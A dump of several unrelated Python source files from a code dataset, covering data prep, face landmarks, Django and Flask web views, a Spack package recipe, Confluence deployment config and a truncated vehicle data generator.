sort_by_drug = pivot_drug_response.reindex(\n pivot_drug_response['auc'].sort_values(by=inhibitors_list[drug_num], ascending=False).index)\n sort_by_drug = sort_by_drug[sort_by_drug > 0]\n drug_response = sort_by_drug['auc'][inhibitors_list[drug_num]]\n drug_response = drug_response.dropna()\n drug_response_ids = drug_response.index\n combined_ids = list(set(gene_count_ids) & set(drug_response_ids))\n drug_sample_genetics = top_gene_counts_t.loc[combined_ids]\n X = drug_sample_genetics.sort_index()\n X.to_csv('./data_outputs/X_data/X_' + inhibitors_list[drug_num] + '.csv')\n\n","sub_path":"other_code/ExpressionData.py","file_name":"ExpressionData.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"282666101","text":"# coding: utf-8\nimport cv2\nfrom glance.jf_ult.geom_tool import GeomTool\n\n\nclass ESR:\n def __init__(self, landmarks: dict, img=None):\n # self.landmarks = landmarks\n self.image = img\n self.landmarks = landmarks\n\n # calculate\n self.left_eye_head = landmarks['43']\n self.left_eye_tail = landmarks['46']\n\n self.right_eye_head = landmarks['40']\n self.right_eye_tail = landmarks['37']\n\n self.left_eye_long = GeomTool.get_pt_dist(self.left_eye_tail, self.left_eye_head)\n self.right_eye_long = GeomTool.get_pt_dist(self.right_eye_tail, self.right_eye_head)\n\n self.eye_bar = GeomTool.get_pt_dist(self.left_eye_tail, self.right_eye_tail)\n self.eye_dist = GeomTool.get_pt_dist(self.left_eye_head, self.right_eye_head)\n\n self.val = (self.eye_bar - self.eye_dist) / self.eye_dist\n self.val_2 = (self.left_eye_long + self.right_eye_long) / self.eye_dist\n self.val_3 = (self.left_eye_long + self.right_eye_long) / (self.eye_dist * 2)\n self.val_4 = self.eye_bar / self.eye_dist\n\n # display\n self.red = (0, 0, 255)\n self.green = (0, 255, 0)\n self.thick = 2\n\n def get_face_coords(self):\n coords = []\n for i in range(17):\n lm_id = str(i + 1)\n coords.append(self.landmarks[lm_id])\n\n return coords\n\n def show(self, dest_path=None):\n temp = self.image.copy()\n cv2.line(temp, self.left_eye_tail, self.right_eye_tail, self.red, self.thick)\n cv2.line(temp, self.left_eye_head, self.right_eye_head, self.green, self.thick)\n\n if dest_path:\n cv2.imwrite(dest_path, temp)\n else:\n cv2.imshow('{}'.format(__name__), temp)\n cv2.waitKey(0)\n","sub_path":"Face-Feat-Tool-Glance/glance/face_feat/ratio/esr.py","file_name":"esr.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"303111725","text":"import sys\nsys.path.append(\"../\")\nimport getopt, os, swarced, pickle, run_ketu, time\nimport numpy as np\nimport multiprocessing as mp\n\n'''You can execute many ketu runs from the commandline using this program.\nRuns should be formatted lsike:\npython multirun.py path_to_query_directory\nThe query directory should contain all the query pickled dictionaries you wish\nto run. There can only be one per EPIC_ID. The output files will be paced in the\nsame location. \nUsing this naming convention, you can only have one query for a particular\nepicID in each location or else it will be overwritten!\n'''\n\ndef main(argv):\n start = time.time()\n query_dir,skipfile,campaign = argv[0], argv[1],argv[2]\n campaign = int(campaign)\n try:\n f = open(skipfile,\"a\")\n f.close()\n except:\n print(\"test\")\n f = open(skipfile,'wb')\n f.close()\n pickle.dump([], open(query_dir + \"timing.pkl\", \"wb\"))\n #Get all the content from the query_directory\n content_list = os.listdir(query_dir)\n #Separate out the .result and .query files\n result_list = [fn for fn in content_list if (\".result\" in fn)]\n query_list = np.array([fn for fn in content_list if (\".query\" in fn)])\n #make a mask for which .query files don't have a .result file\n not_run = np.array([(query.split(\".\")[0] + \".result\" not in result_list) for query in query_list])\n query_list = query_list[not_run]\n #Format the arguments of epicID, campaign, and absolute path to each query file for the remaining queries\n args = [[fn[4:13], campaign, query_dir + fn, skipfile] for fn in query_list]\n #Farm them to multiprocessing\n pool = mp.Pool(processes=mp.cpu_count())\n results = pool.map(run_ketu.main, args)\n pool.close()\n pool.join()\n pickle.dump([time.time() - start, results], open(query_dir + \"timing.pkl\", \"wb\"))\n \nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"multirun_ketu.py","file_name":"multirun_ketu.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"653439942","text":"from django.urls import path\nfrom . import views\n\napp_name = 'chatapp'\nurlpatterns = [\n path('', views.HomeView.as_view(), name='home'),\n path('chat///messages', views.chatpage, name='chatpage'),\n path('chat///delete-message//', views.delete_chat_message,\n name=\"delete_chat_message\"),\n path('chat/chat-redirecter///', views.user_chat_redirecter,\n name='user_chat_redirecter'),\n]\n","sub_path":"chatapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"650245714","text":"# Copyright 2013-2019 Lawrence Livermore National Security, LLC and other\n# Spack Project Developers. See the top-level COPYRIGHT file for details.\n#\n# SPDX-License-Identifier: (Apache-2.0 OR MIT)\n\n\nfrom spack import *\nimport os\n\n\nclass Vtkm(CMakePackage, CudaPackage):\n \"\"\"VTK-m is a toolkit of scientific visualization algorithms for emerging\n processor architectures. VTK-m supports the fine-grained concurrency for\n data analysis and visualization algorithms required to drive extreme scale\n computing by providing abstract models for data and execution that can be\n applied to a variety of algorithms across many different processor\n architectures.\"\"\"\n\n homepage = \"https://m.vtk.org/\"\n url = \"https://gitlab.kitware.com/api/v4/projects/vtk%2Fvtk-m/repository/archive.tar.gz?sha=v1.3.0\"\n git = \"https://gitlab.kitware.com/vtk/vtk-m.git\"\n\n # version used for ascent\n version('ascent_ver', commit='23b73103e0ea242f1d9b3e7116410d1c6c832d38', preferred=True)\n version('master', branch='master')\n version('1.3.0', \"d9f6e274dec2ea01273cccaba356d23ca88c5a25\")\n version('1.2.0', \"3295fed86012226c107e1f2605ca7cc583586b63\")\n version('1.1.0', \"6aab1c0885f6ffaaffcf07930873d0df\")\n\n # use release, instead of release with debug symbols b/c vtkm libs\n # can overwhelm compilers with too many symbols\n variant('build_type', default='Release', description='CMake build type',\n values=('Debug', 'Release', 'RelWithDebInfo', 'MinSizeRel'))\n variant(\"shared\", default=True, description=\"build shared libs\")\n variant(\"cuda\", default=False, description=\"build cuda support\")\n variant(\"doubleprecision\", default=True,\n description='enable double precision')\n variant(\"logging\", default=False, description=\"build logging support\")\n variant(\"mpi\", default=False, description=\"build mpi support\")\n variant(\"openmp\", default=False, description=\"build openmp support\")\n variant(\"rendering\", default=True, description=\"build rendering support\")\n variant(\"tbb\", default=True, description=\"build TBB support\")\n variant(\"64bitids\", default=False,\n description=\"enable 64 bits ids\")\n\n depends_on(\"cmake\")\n\n depends_on(\"tbb\", when=\"+tbb\")\n depends_on(\"cuda\", when=\"+cuda\")\n depends_on(\"mpi\", when=\"+mpi\")\n\n # secretly change build to static when building with cuda to bypass spack variant\n # forwarding crazyness\n #conflicts('+cuda', when='+shared', msg='vtk-m must be built statically (~shared) when cuda is enabled')\n\n def cmake_args(self):\n spec = self.spec\n options = []\n with working_dir('spack-build', create=True):\n options = [\"../\",\n \"-DVTKm_ENABLE_TESTING:BOOL=OFF\"]\n # shared vs static libs logic\n # force building statically with cuda\n if \"+cuda\" in spec:\n options.append('-DBUILD_SHARED_LIBS=OFF')\n else:\n if \"+shared\" in spec:\n options.append('-DBUILD_SHARED_LIBS=ON')\n else:\n options.append('-DBUILD_SHARED_LIBS=OFF')\n # cuda support\n if \"+cuda\" in spec:\n options.append(\"-DVTKm_ENABLE_CUDA:BOOL=ON\")\n options.append(\"-DCMAKE_CUDA_HOST_COMPILER={0}\".format(env[\"SPACK_CXX\"]))\n if 'cuda_arch' in spec.variants:\n cuda_arch = spec.variants['cuda_arch'].value[0]\n vtkm_cuda_arch = \"native\"\n arch_map = {\"75\":\"turing\", \"70\":\"volta\",\n \"62\":\"pascal\", \"61\":\"pascal\", \"60\":\"pascal\",\n \"53\":\"maxwell\", \"52\":\"maxwell\", \"50\":\"maxwell\",\n \"35\":\"kepler\", \"32\":\"kepler\", \"30\":\"kepler\"}\n if cuda_arch in arch_map:\n vtkm_cuda_arch = arch_map[cuda_arch]\n options.append(\n '-DVTKm_CUDA_Architecture={0}'.format(vtkm_cuda_arch))\n else:\n options.append(\"-DVTKm_ENABLE_CUDA:BOOL=OFF\")\n\n # double precision\n if \"+doubleprecision\" in spec:\n options.append(\"-DVTKm_USE_DOUBLE_PRECISION:BOOL=ON\")\n else:\n options.append(\"-DVTKm_USE_DOUBLE_PRECISION:BOOL=OFF\")\n\n # logging support\n if \"+logging\" in spec:\n if spec.satisfies('@:1.2.0') and \\\n spec['vtkm'].version.string != 'master' and \\\n spec['vtkm'].version.string != 'ascent_ver' :\n raise InstallError('logging is not supported for\\\n vtkm version lower than 1.3')\n options.append(\"-DVTKm_ENABLE_LOGGING:BOOL=ON\")\n else:\n options.append(\"-DVTKm_ENABLE_LOGGING:BOOL=OFF\")\n\n # mpi support\n if \"+mpi\" in spec:\n if spec.satisfies('@:1.2.0') and \\\n spec['vtkm'].version.string != 'master' and \\\n spec['vtkm'].version.string != 'ascent_ver':\n raise InstallError('mpi is not supported for\\\n vtkm version lower than 1.3')\n options.append(\"-DVTKm_ENABLE_MPI:BOOL=ON\")\n else:\n options.append(\"-DVTKm_ENABLE_MPI:BOOL=OFF\")\n\n # openmp support\n if \"+openmp\" in spec:\n # openmp is added since version 1.3.0\n if spec.satisfies('@:1.2.0') and \\\n spec['vtkm'].version.string != 'master' and \\\n spec['vtkm'].version.string != 'ascent_ver':\n raise InstallError('OpenMP is not supported for\\\n vtkm version lower than 1.3')\n options.append(\"-DVTKm_ENABLE_OPENMP:BOOL=ON\")\n else:\n options.append(\"-DVTKm_ENABLE_OPENMP:BOOL=OFF\")\n\n # rendering support\n if \"+rendering\" in spec:\n options.append(\"-DVTKm_ENABLE_RENDERING:BOOL=ON\")\n else:\n options.append(\"-DVTKm_ENABLE_RENDERING:BOOL=OFF\")\n\n # tbb support\n if \"+tbb\" in spec:\n # vtk-m detectes tbb via TBB_ROOT env var\n os.environ[\"TBB_ROOT\"] = spec[\"tbb\"].prefix\n options.append(\"-DVTKm_ENABLE_TBB:BOOL=ON\")\n else:\n options.append(\"-DVTKm_ENABLE_TBB:BOOL=OFF\")\n\n # 64 bit ids\n if \"+64bitids\" in spec:\n options.append(\"-DVTKm_USE_64BIT_IDS:BOOL=ON\")\n print(\"64 bit ids enabled\")\n else:\n options.append(\"-DVTKm_USE_64BIT_IDS:BOOL=OFF\")\n return options\n","sub_path":"scripts/uberenv/packages/vtkm/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":6765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"628947448","text":"from bs4 import BeautifulSoup\r\nfrom functools import wraps\r\n\r\n\r\n\r\nclass BeautifulSoupMakeTag:\r\n\t\"\"\" Pomocná třída pro BeautifulSoup k vytváření tagů.\r\n\t\tPoužívá interní html parser Pythonu.\r\n\r\n\t\tclass_ --> element[\"class\"]\r\n\t\tstring_ --> element.string\r\n\t\tparent_ --> parent_.append(element)\r\n\t\thttpequiv_ --> kwargs[\"http-equiv\"]\r\n\r\n\t\tVše ostatní bude rovnou automaticky přidáno do kwargs.\r\n\t\"\"\"\r\n\r\n\tdef __init__(self):\r\n\t\tself.BeautifulSoup_new_tag = BeautifulSoup(\"\", \"html.parser\").new_tag\r\n\r\n\tdef new_tag(self, *args, **kwargs):\r\n\t\tclass_ = kwargs.pop(\"class_\", None)\r\n\t\tstring_ = kwargs.pop(\"string_\", None)\r\n\t\tparent_ = kwargs.pop(\"parent_\", None)\r\n\t\t\r\n\t\thttpequiv_ = kwargs.pop(\"httpequiv_\", None)\r\n\t\tif httpequiv_:\r\n\t\t\tkwargs[\"http-equiv\"] = httpequiv_\r\n\r\n\t\telement = self.BeautifulSoup_new_tag(*args,\r\n\t\t\t\t\t**{k:v for k,v in kwargs.items() if v})\r\n\r\n\t\tif class_:\r\n\t\t\telement[\"class\"] = class_\r\n\t\tif string_:\r\n\t\t\telement.string = str(string_)\r\n\t\tif parent_:\r\n\t\t\tparent_.append(element)\r\n\r\n\t\treturn element\r\n\r\n\r\ndef debug_decorator(vebrose=True):\r\n\t\"\"\" Postupně zavolá funkce (step_a, step_b a step_c)\r\n\t\tz obalené třídy. Jednotlivé kroky popíše v HTML\r\n\t\tpodoby do \"debug_container\".\r\n\r\n\t\tvebrose=True --> důkladný popis výsledku (default)\r\n\t\tvebrose=False --> pouze Ok jako popis správného výsledku\r\n\t\"\"\"\r\n\t\r\n\tdef func_decorator(func):\r\n\t\t@wraps(func)\r\n\t\tdef func_wrapper(arg, arg_decorator):\r\n\t\t\tdebug_func = func(arg)\r\n\t\t\tbs_new = BeautifulSoupMakeTag().new_tag\r\n\r\n\t\t\tbs_new(\"div\",\r\n\t\t\t\tclass_=\"block\",\r\n\t\t\t\tstring_=\"%s:%s\" % (func.__name__, func.__doc__),\r\n\t\t\t\tparent_=arg_decorator)\r\n\r\n\t\t\ttry:\r\n\t\t\t\tbs_new(\"span\", string_=\"krok_a\", parent_=arg_decorator)\r\n\t\t\t\tdebug_a = debug_func.step_a()\r\n\t\t\t\tif not debug_a:\r\n\t\t\t\t\traise Exception(\"hodnota je None\")\r\n\t\t\t\tbs_new(\"span\",\r\n\t\t\t\t\tclass_=\"ok\",\r\n\t\t\t\t\tstring_=\"Ok\",\r\n\t\t\t\t\tparent_=arg_decorator)\r\n\r\n\t\t\t\tbs_new(\"span\", string_=\"krok_b\", parent_=arg_decorator)\r\n\t\t\t\tdebug_b = debug_func.step_b(debug_a)\r\n\t\t\t\tif not debug_b:\r\n\t\t\t\t\traise Exception(\"hodnota je None\")\r\n\t\t\t\tbs_new(\"span\",\r\n\t\t\t\t\tclass_=\"ok\",\r\n\t\t\t\t\tstring_=\"Ok\",\r\n\t\t\t\t\tparent_=arg_decorator)\r\n\r\n\t\t\t\tif str(type(debug_b)) == \"\":\r\n\t\t\t\t\tdebug_b[\"class\"] = \"marked\"\r\n\r\n\t\t\t\tbs_new(\"span\", string_=\"krok_c\", parent_=arg_decorator)\r\n\t\t\t\tdebug_c = debug_func.step_c(debug_b)\r\n\t\t\t\tif not debug_c:\r\n\t\t\t\t\traise Exception(\"hodnota je None\")\r\n\t\t\t\tbs_new(\"span\",\r\n\t\t\t\t\tclass_=\"ok\",\r\n\t\t\t\t\tstring_=debug_c if vebrose else \"Ok\",\r\n\t\t\t\t\tparent_=arg_decorator)\r\n\r\n\t\t\texcept Exception as error:\r\n\t\t\t\tbs_new(\"span\",\r\n\t\t\t\t\tclass_=\"fail\",\r\n\t\t\t\t\tstring_=error,\r\n\t\t\t\t\tparent_=arg_decorator)\r\n\r\n\t\t\t\tdebug_c = None\r\n\r\n\t\t\treturn debug_c\r\n\r\n\t\treturn func_wrapper\r\n\r\n\treturn func_decorator\r\n","sub_path":"utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":2749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"574137570","text":"pkg_yum = {}\n\nsvc_systemd = {\n 'confluence': {\n 'enabled': True,\n 'needs': [\n 'file:/usr/lib/systemd/system/confluence.service',\n ],\n },\n}\n\nusers = {}\n\ngroups = {}\n\nfiles = {\n '/usr/lib/systemd/system/confluence.service': {\n 'source': \"usr/lib/systemd/system/confluence.service\",\n 'owner': \"root\",\n 'group': \"root\",\n 'mode': \"0644\",\n 'content_type': \"mako\",\n },\n}\n\ndirectories = {}\n\nfor confluence in node.metadata['confluence']:\n\n users[\"{}\".format(confluence['run_user'])] = {\n \"full_name\": \"Confluence Service Account\",\n \"gid\": 1101,\n \"home\": (confluence['data_dir']),\n \"uid\": 1101,\n }\n\n groups[\"confluence\".format(confluence['run_user'])] = {\n \"gid\": 1101,\n }\n\n files[\"{}/bin/setenv.sh\".format(confluence['install_dir'])] = {\n 'source': \"confluence/bin/setenv.sh\",\n 'owner': \"root\",\n 'group': \"root\",\n 'mode': \"0664\",\n 'content_type': \"mako\",\n 'context': {\n 'confluence': confluence,\n },\n 'triggers': [\n \"svc_systemd:confluence:restart\",\n ],\n }\n\n files[\"{}/bin/user.sh\".format(confluence['install_dir'])] = {\n 'source': \"confluence/bin/user.sh\",\n 'owner': \"root\",\n 'group': \"root\",\n 'mode': \"0664\",\n 'content_type': \"mako\",\n 'context': {\n 'confluence': confluence,\n },\n 'triggers': [\n \"svc_systemd:confluence:restart\",\n ],\n }\n\n files[\"{}/conf/server.xml\".format(confluence['install_dir'])] = {\n 'source': \"confluence/conf/server.xml\",\n 'owner': \"root\",\n 'group': \"root\",\n 'mode': \"0664\",\n 'content_type': \"mako\",\n 'context': {\n 'confluence': confluence,\n },\n 'triggers': [\n \"svc_systemd:confluence:restart\",\n ],\n }\n\n files[\"{}/confluence/WEB-INF/classes/confluence-init.properties\".format(confluence['install_dir'])] = {\n 'source': \"confluence/confluence/WEB-INF/classes/confluence-init.properties\",\n 'owner': \"root\",\n 'group': \"root\",\n 'mode': \"0664\",\n 'content_type': \"mako\",\n 'context': {\n 'confluence': confluence,\n },\n 'triggers': [\n \"svc_systemd:confluence:restart\",\n ],\n }\n\n directories[\"{}/logs\".format(confluence['install_dir'])] = {\n 'mode': \"0775\",\n 'owner': \"confluence\",\n 'group': \"root\",\n }\n\n directories[\"{}/temp\".format(confluence['install_dir'])] = {\n 'mode': \"0755\",\n 'owner': \"confluence\",\n 'group': \"root\",\n }\n\n directories[\"{}/work\".format(confluence['install_dir'])] = {\n 'mode': \"0775\",\n 'owner': \"confluence\",\n 'group': \"root\",\n }\n\nif node.has_bundle(\"monit\"):\n files['/etc/monit.d/confluence'] = {\n 'source': \"etc/monit.d/confluence\",\n 'mode': \"0640\",\n 'owner': \"root\",\n 'group': \"root\",\n 'content_type': \"mako\",\n 'context': {\n 'confluence': confluence,\n },\n 'triggers': [\n \"svc_systemd:monit:restart\",\n ],\n }\n\nif node.has_bundle(\"collectd-java\"):\n\n files['/etc/collectd.d/conf.d/confluence.conf'] = {\n 'source': \"etc/collectd.d/conf.d/confluence.conf\",\n 'mode': \"0640\",\n 'owner': \"root\",\n 'group': \"root\",\n 'content_type': \"mako\",\n 'context': {\n 'confluence': confluence,\n },\n 'triggers': [\n \"svc_systemd:collectd:restart\",\n ],\n }\n\n files['/etc/collectd.d/types/confluence.db'] = {\n 'source': \"etc/collectd.d/types/confluence.db\",\n 'mode': \"0640\",\n 'owner': \"root\",\n 'group': \"root\",\n 'context': {\n 'confluence': confluence,\n },\n 'triggers': [\n \"svc_systemd:collectd:restart\",\n ],\n }\n","sub_path":"bundles/confluence/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":3960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"182634102","text":"from flask import (render_template, Blueprint, url_for, redirect,\n \t\t\t\t\tflash, current_app, request, abort, Markup)\nfrom compleaks import db, mail\nfrom flask_login import current_user, login_required\nfrom flask_mail import Message\nfrom compleaks.usuarios.models import Usuario\nfrom compleaks.newsletters.models import Divulgacao, Material\nfrom compleaks.newsletters.forms import LetterForm, MaterialForm\nimport os\nfrom datetime import datetime\n\nnewsletters = Blueprint('newsletters', __name__,template_folder='templates/newsletters')\n\n@newsletters.route('/adicionar', methods=['POST', 'GET'])\n@login_required\ndef adicionar():\n\n\tif not current_user.is_admin:\n\t\tabort(403)\n\n\tform = LetterForm()\n\n\tif form.validate_on_submit():\n\n\t\ttarget = os.path.join(current_app.root_path, 'newsletters/templates/newsletters/uploads')\n\t\tfile = form.html.data\n\t\tfilename = file.filename\n\t\tdestination = \"/\".join([target, filename])\n\n\t\tif os.path.exists(destination):\n\t\t\tflash(\"Não foi possivel salvar o arquivo!\", \"danger\")\n\t\t\tflash(\"O nome do arquivo que vc submeteu já existe, favor mudar o nome e tentar novamente!\", \"info\")\n\t\t\treturn render_template('novo_letter.html', form=form)\n\n\n\t\tfile.save(destination)\n\n\n\t\t'''zip_archive = ZipFile(filename, \"w\")\n\t\tzip_archive.write(destination, destination[len(target) + 1:])'''\n\n\t\tnova = Divulgacao(title=form.titulo.data, body=form.front_end.data, html=filename)\n\t\tdb.session.add(nova)\n\t\tdb.session.commit()\n\t\tflash(\"Newsletters adicionado com sucesso\", \"success\")\n\n\treturn render_template('novo_letter.html', form=form)\n\n\n@newsletters.route('/deletar/', methods=['POST', 'GET'])\n@login_required\ndef deletar(id):\n\n\tif not current_user.is_admin:\n\t\tabort(403)\n\n\tform = LetterForm()\n\n\tdelete = Divulgacao.query.get_or_404(id)\n\n\ttarget = os.path.join(current_app.root_path, 'newsletters/templates/newsletters/uploads')\n\tdestination = \"/\".join([target, delete.html])\n\tos.remove(destination)\n\n\tdb.session.delete(delete)\n\tdb.session.commit()\n\n\tflash(\"Newsletters deletado com sucesso\", \"info\")\n\n\treturn redirect(url_for(\"newsletters.listar\"))\n\n\n@newsletters.route('/editar/', methods=['POST', 'GET'])\n@login_required\ndef editar(id):\n\n\tif not current_user.is_admin:\n\t\tabort(403)\n\n\tform = LetterForm()\n\tedit = Divulgacao.query.get_or_404(id)\n\n\tif form.validate_on_submit():\n\n\t\ttarget = os.path.join(current_app.root_path, 'newsletters/templates/newsletters/uploads')\n\t\tdestination = \"/\".join([target, edit.html])\n\t\tos.remove(destination)\n\n\t\ttarget = os.path.join(current_app.root_path, 'newsletters/templates/newsletters/uploads')\n\t\tfile = form.html.data\n\t\tfilename = file.filename\n\t\tdestination2 = \"/\".join([target, filename])\n\n\t\tif os.path.exists(destination2) and (destination != destination2):\n\t\t\tflash(\"Não foi possivel salvar o arquivo!\", \"danger\")\n\t\t\tflash(\"O nome do arquivo que vc submeteu já existe, favor mudar o nome e tentar novamente!\", \"info\")\n\t\t\treturn render_template('novo_letter.html', form=form)\n\n\t\tfile.save(destination2)\n\n\t\tedit.title = form.titulo.data\n\t\tedit.body = form.front_end.data\n\t\tedit.html = destination\t\n\t\tdb.session.commit()\n\t\tflash(\"Newsletters modificado com sucesso\", \"success\")\n\n\t\treturn redirect(url_for(\"newsletters.listar\"))\n\n\tform.titulo.data = edit.title\n\tform.front_end.data = edit.body\n\n\treturn render_template('editar_letter.html', form=form)\n\n\n@newsletters.route('/listar', methods=['POST', 'GET'])\n@login_required\ndef listar():\n\n\tif not current_user.is_admin:\n\t\tabort(403)\n\n\n\tpage = request.args.get('page', 1, type=int)\n\tletters = Divulgacao.query.order_by(Divulgacao.data_criacao.asc()).paginate(page=page, per_page=10)\n\n\treturn render_template('lista_letters.html', letters=letters)\n\n\ndef send_email(letter, user, enviados, fahas, emails):\n\n\tmsg = Message(letter.title,\n sender='jinformatica471@gmail.com',\n recipients=[user.email])\n\n\tmsg.html = render_template(\"uploads/\"+letter.html, user=user)\n\tmsg.body = letter.body\n\n\ttry:\n\t\tmail.send(msg)\n\t\tenviados = enviados + 1\n\texcept e:\n\t\tfahas = fahas + 1\n\t\temails.append(user.email)\n\treturn enviados, fahas, emails\n\n\n@newsletters.route('/enviar_emails/', methods=['POST', 'GET'])\n@login_required\ndef enviar(id):\n\n\tif not current_user.is_admin:\n\t\tabort(403)\n\n\tletter = Divulgacao.query.get_or_404(id)\n\n\tusuarios = Usuario.query.filter_by(ativado=True)\n\tenviados = 0\n\tfahas = 0\n\temails = []\n\n\tfor user in usuarios:\n\n\t\tenviados, fahas, emails = send_email(letter=letter, user=user, enviados=enviados, fahas=fahas, emails=emails)\n\n\tflash(str(enviados)+\" mensagens enviandas com sucesso!\", \"success\")\n\tflash(str(fahas)+\" mensagens enviandas com falhas!\", \"danger\")\n\tflash(\"Isso não siguinifica que todos os e-mails existam!\", \"danger\")\n\n\tfor email in emails:\n\t\tflash(email, \"danger\")\n\n\tletter.last_send = datetime.now()\n\n\treturn redirect(url_for('newsletters.listar'))\n\n\n@newsletters.route('/testar/', methods=['POST', 'GET'])\n@login_required\ndef testar(id):\n\n\tif not current_user.is_admin:\n\t\tabort(403)\n\n\tletter = Divulgacao.query.get_or_404(id)\n\tteste_user = Usuario(\"Teste User\", \"hhash\", \"Teste letters\", \"email@teste.com\", \n\t\t\t\t\t\t\t\"O sistema aqui é bruto\", 12)\n\n\treturn render_template('uploads/'+letter.html, user=teste_user)\n\n\n@newsletters.route('/material', methods=['POST', 'GET'])\n@login_required\ndef material():\n\n\tif not current_user.is_admin:\n\t\tabort(403)\n\n\tform_edit = MaterialForm()\n\tform = MaterialForm()\n\n\tif form.validate_on_submit():\n\n\t\ttarget = os.path.join(current_app.root_path, 'static/uploads/Marketing')\n\t\tfile = form.arquivo.data\n\t\tfilename = file.filename\n\t\tdestination = \"/\".join([target, filename])\n\n\t\tif os.path.exists(destination):\n\t\t\tflash(\"Não foi possivel salvar o arquivo!\", \"danger\")\n\t\t\tflash(\"O nome do arquivo que vc submeteu já existe, favor mudar o nome e tentar novamente!\", \"info\")\n\t\t\treturn render_template('novo_letter.html', form=form)\n\t\t\t\n\t\tfile.save(destination)\n\n\t\tnova = Material(title=form.titulo.data, arquivo=filename)\n\t\tdb.session.add(nova)\n\t\tdb.session.commit()\n\t\tflash(\"Material adicionado com sucesso\", \"success\")\n\n\n\tpage = request.args.get('page', 1, type=int)\n\tmateriais = Material.query.order_by(Material.data_criacao.asc()).paginate(page=page, per_page=10)\n\n\treturn render_template('material_marketing.html', materiais=materiais, form=form, form_edit=form_edit)\n\n\n@newsletters.route('/editar_material/', methods=['POST', 'GET'])\n@login_required\ndef edit_material(id):\n\n\tif not current_user.is_admin:\n\t\tabort(403)\n\n\tform = MaterialForm()\n\tedit = Material.query.get_or_404(id)\n\n\tif form.validate_on_submit():\n\n\t\ttarget = os.path.join(current_app.root_path, 'static/uploads/Marketing')\n\t\tdestination = \"/\".join([target, edit.arquivo])\n\t\tos.remove(destination)\n\n\n\t\tedit.title = form.titulo.data\n\t\tfile = form.arquivo.data\n\t\tfilename = file.filename\n\t\tdestination2 = \"/\".join([target, filename])\n\n\t\tif os.path.exists(destination2) and (destination != destination2):\n\t\t\tflash(\"Não foi possivel salvar o arquivo!\", \"danger\")\n\t\t\tflash(\"O nome do arquivo que você submeteu já existe, favor mudar o nome e tentar novamente!\", \"info\")\n\t\t\treturn render_template('novo_letter.html', form=form)\n\n\t\tfile.save(destination2)\n\t\tedit.arquivo = filename\n\t\tdb.session.commit()\n\t\tflash(\"Material modificado com sucesso\", \"success\")\n\n\treturn redirect(url_for(\"newsletters.material\"))\n\n\n@newsletters.route('/deletar_material/', methods=['POST', 'GET'])\n@login_required\ndef deletar_material(id):\n\n\tif not current_user.is_admin:\n\t\tabort(403)\n\n\tform = LetterForm()\n\n\tdelete = Material.query.get_or_404(id)\n\tdb.session.delete(delete)\n\tdb.session.commit()\n\n\tflash(\"Material deletado com sucesso\", \"info\")\n\n\treturn redirect(url_for(\"newsletters.material\"))\n","sub_path":"Compleaks/compleaks/newsletters/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"140546131","text":"import random\nimport string\n\nfrom django.shortcuts import render\n\n# Create your views here.\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom orders.models import Order\n\n\nclass AddOrders(APIView):\n\n def post(self, request, *args, **kwargs):\n items = request.data.get('Items')\n\n item_list = str(items).split(',')\n trans_id = get_random_string(8)\n\n for item in item_list:\n\n try:\n order = Order.objects.create()\n order.trans_id = trans_id\n order.item = item\n\n order.save()\n\n except Exception as e:\n return Response({\n 'status': False,\n 'Detail': str(e)\n })\n\n return Response({\n 'status': True,\n 'Detail': 'Order ' + trans_id + ' has been created ',\n 'Item Count': len(item_list)\n })\n\n\ndef get_random_string(length):\n letters = string.ascii_uppercase\n result_str = ''.join(random.choice(letters) for i in range(length))\n return result_str\n","sub_path":"orders/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"344502001","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Oct 29 22:10:23 2021\r\n\r\n@author: sreem\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport random\r\nfrom random import seed\r\nfrom random import randint\r\nimport datetime\r\nfrom datetime import date\r\nimport csv\r\n\r\nfilename = 'Vehicleinfo.csv'\r\n\r\nVlist = ['TS08HE6446', 'AP28AN8619','TS08ER2494'] \r\n#Ebatlist = ['15','125','276','124','40', '125', '276','180','255']\r\n#Mbatlist = ['1.2','2.2','3.0','4.6','1.2','3.7','2.2','1.2','4.6','4.6','3.4','3.7','3.0','2.2','40','3.7','2.1','40','40','70','124','4.6','300']\r\nNbatlist = ['15','125','276','124','276','125','124']\r\n#array = [10, 20, 30, 40, 50, 20, 40]\r\nbike = random.uniform(1.0, 4.7)\r\nriks = random.uniform(3.7,10)\r\nl4w = random.uniform(30.0,76.4)\r\ntruck = random.uniform(100.0,400.0)\r\nbus = random.uniform(72.0,324.0)\r\ncur = base = datetime.datetime (2019,1,1,hour=12,minute=0,second=0)\r\n#cur = base = datetime.datetime.now() \r\nend = base + datetime.timedelta(days=365)\r\ndelta = datetime.timedelta(minutes=30)\r\nearlyhours = datetime.time(hour=0,minute=0,second=0)\r\nMorningH = datetime.time(hour=5,minute=0,second=0)\r\neveningH = datetime.time(hour=22,minute=0,second=0)\r\nvtype = 0\r\nbattery = 0\r\npower_con = 0\r\nwith open(filename, 'w', encoding='UTF8', newline='') as f:\r\n writer = 